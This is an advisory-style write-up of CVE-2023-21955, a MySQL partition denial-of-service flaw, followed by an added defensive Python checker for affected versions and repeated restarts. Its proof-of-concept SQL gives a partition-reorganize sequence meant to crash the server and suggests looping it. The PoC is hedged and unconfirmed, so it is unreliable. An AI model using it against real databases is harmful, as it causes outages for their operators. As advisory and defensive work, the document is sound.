CVE-2023-21955 is a vulnerability in Oracle MySQL Server (component: Server: Partition). A high-privileged user with network access to the server can easily crash or hang it, causing a denial of service (DoS). The issue affects MySQL 8.0.32 and earlier.

This bug is easy to exploit and can be used to repeatedly take down affected MySQL servers.

Who is affected?

According to Oracle's official advisory, any MySQL 8.0.32 or earlier instance is vulnerable if it:

- Allows high-privileged users network access (e.g., DBA, application superuser)

NB: An attacker MUST have account credentials with sufficient privileges (such as ALTER, CREATE, or DROP on tables or databases).

- CVSS Score: 4.9 out of 10, so not critical, but still problematic on shared or cloud databases
- Primary risk: the server can be crashed repeatedly, causing downtime and potentially data loss if crash recovery is not set up.
- Attack complexity: *Low*; no user interaction is needed, only simple SQL statements.
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

How does the exploit work?

The issue is in the Partition code of MySQL. When a high-privileged user sends certain crafted queries (usually involving altering or dropping partitions in tables), it triggers an unsafe code path, which MySQL fails to handle properly, resulting in a crash or a full hang.

- Create a table with partitions.
- Perform partition operations (e.g., ALTER TABLE ... REORGANIZE PARTITION) with malformed or conflicting definitions.

Proof of Concept: Triggering DoS

Let's see how an attacker (with proper credentials) could exploit this.

Note: This only demonstrates a reproducible crash/hang. Modify the table and partition names as required for your environment.

```sql
-- Step 1: Create a partitioned table
CREATE TABLE exploitable_table (
    id INT NOT NULL,
    stuff VARCHAR(100)
)
PARTITION BY RANGE (id) (
    PARTITION p VALUES LESS THAN (10),
    PARTITION p1 VALUES LESS THAN (100)
);

-- Step 2: Run repeated or malformed ALTER commands
ALTER TABLE exploitable_table REORGANIZE PARTITION p1 INTO (
    PARTITION p2 VALUES LESS THAN (100)
);

-- Some reports indicate that running the ALTER above multiple times, or mixing
-- DROP and REORGANIZE on the same partition, can cause a crash.
-- This may crash or hang the MySQL server process.
```

In real attacks, a script could loop this command to keep the server down.

Fixed in MySQL 8.0.33 and later. Update ASAP if you use partitioned tables.

References & More Reading

- Oracle Security Alert Advisory
- Oracle Critical Patch Update Advisory - April 2023
- NVD - CVE-2023-21955
- MySQL Bug #35108560 (Oracle bug DB) *(requires Oracle login for details)*


TL;DR:  
CVE-2023-21955 lets a high-privileged user with network access crash your MySQL 8.0.32 (or earlier) server using certain partition commands. Update MySQL, audit high-privileged users, and stay alert for repeat crashes. Don't ignore server updates!
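Two of the three recommendations above (check the version, watch for repeat crashes) are easy to automate. The script below is an added example written for this write-up; it is not code from the original post, Oracle, or the MySQL project. It decides whether a server version string falls inside the affected range the advisory describes (8.0.32 and earlier, fixed in 8.0.33) and scans MySQL error-log output for the "ready for connections" startup line, flagging a server that restarts several times within a short window. The log lines are constructed samples in the shape of real mysqld 8.0 error-log output, and the 5-minute / 3-restart threshold is an arbitrary choice you would tune for your environment.

```python
"""Defensive checks for CVE-2023-21955 (MySQL Server: Partition DoS).

Added example, not from the original write-up. It shows:
  1. deciding whether a MySQL version string is in the affected range
     (8.0.32 and earlier; fixed in 8.0.33), and
  2. spotting the "repeat crash" pattern in a MySQL error log, i.e. the
     server announcing "ready for connections" several times in a short window.
"""
import re
from datetime import datetime, timedelta

FIXED_VERSION = (8, 0, 33)  # first release that carries the fix, per the advisory

# Constructed sample lines in the shape of MySQL 8.0 error-log output.
# Four startups in three minutes on 8.0.32, then one startup after an upgrade.
SAMPLE_ERROR_LOG = """\
2023-04-20T10:00:01.000000Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32'  socket: '/var/run/mysqld/mysqld.sock'  port: 3306  MySQL Community Server - GPL.
2023-04-20T10:01:20.000000Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32'  socket: '/var/run/mysqld/mysqld.sock'  port: 3306  MySQL Community Server - GPL.
2023-04-20T10:02:44.000000Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32'  socket: '/var/run/mysqld/mysqld.sock'  port: 3306  MySQL Community Server - GPL.
2023-04-20T10:03:10.000000Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32'  socket: '/var/run/mysqld/mysqld.sock'  port: 3306  MySQL Community Server - GPL.
2023-04-20T10:40:00.000000Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.33'  socket: '/var/run/mysqld/mysqld.sock'  port: 3306  MySQL Community Server - GPL.
"""

READY_RE = re.compile(
    r"^(?P<ts>\S+Z)\s+\d+\s+\[System\].*?ready for connections\. Version: '(?P<ver>[^']+)'"
)


def parse_version(version: str) -> tuple:
    """Turn '8.0.32-0ubuntu0.22.04.2' into (8, 0, 32); build suffixes are ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised MySQL version string: {version!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version: str) -> bool:
    """True when the server is on 8.0.32 or earlier, i.e. before the fix."""
    return parse_version(version) < FIXED_VERSION


def parse_restarts(log_text: str) -> list:
    """Return (timestamp, version) for every startup ('ready for connections') line."""
    events = []
    for line in log_text.splitlines():
        m = READY_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S.%fZ")
            events.append((ts, m.group("ver")))
    return events


def repeated_restarts(events, window=timedelta(minutes=5), threshold=3) -> bool:
    """True if `threshold` or more startups fall inside any `window`-long span.

    Thresholds are arbitrary defaults; a healthy server rarely restarts at all,
    so a handful of startups in a few minutes is worth an alert.
    """
    times = sorted(ts for ts, _ in events)
    for i, start in enumerate(times):
        # Sliding window anchored at each startup: count later startups within it.
        count = sum(1 for t in times[i:] if t - start <= window)
        if count >= threshold:
            return True
    return False


def assess(log_text: str) -> dict:
    """Summarise restart behaviour and whether the *current* build is still affected."""
    events = parse_restarts(log_text)
    latest_version = events[-1][1] if events else None
    return {
        "restarts": len(events),
        "repeat_crash_pattern": repeated_restarts(events),
        "latest_version": latest_version,
        "latest_version_affected": bool(latest_version and is_affected(latest_version)),
    }


if __name__ == "__main__":
    for key, value in assess(SAMPLE_ERROR_LOG).items():
        print(f"{key}: {value}")
```

On the constructed log the report shows five startups, a repeat-crash pattern, and a latest version of 8.0.33 that is no longer affected. In practice you would feed it the server's real error log (the path is in the `log_error` system variable) and wire the `repeat_crash_pattern` flag into whatever alerting you already run.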

Timeline

Published on: 04/18/2023 20:15:00 UTC
Last modified on: 04/27/2023 15:15:00 UTC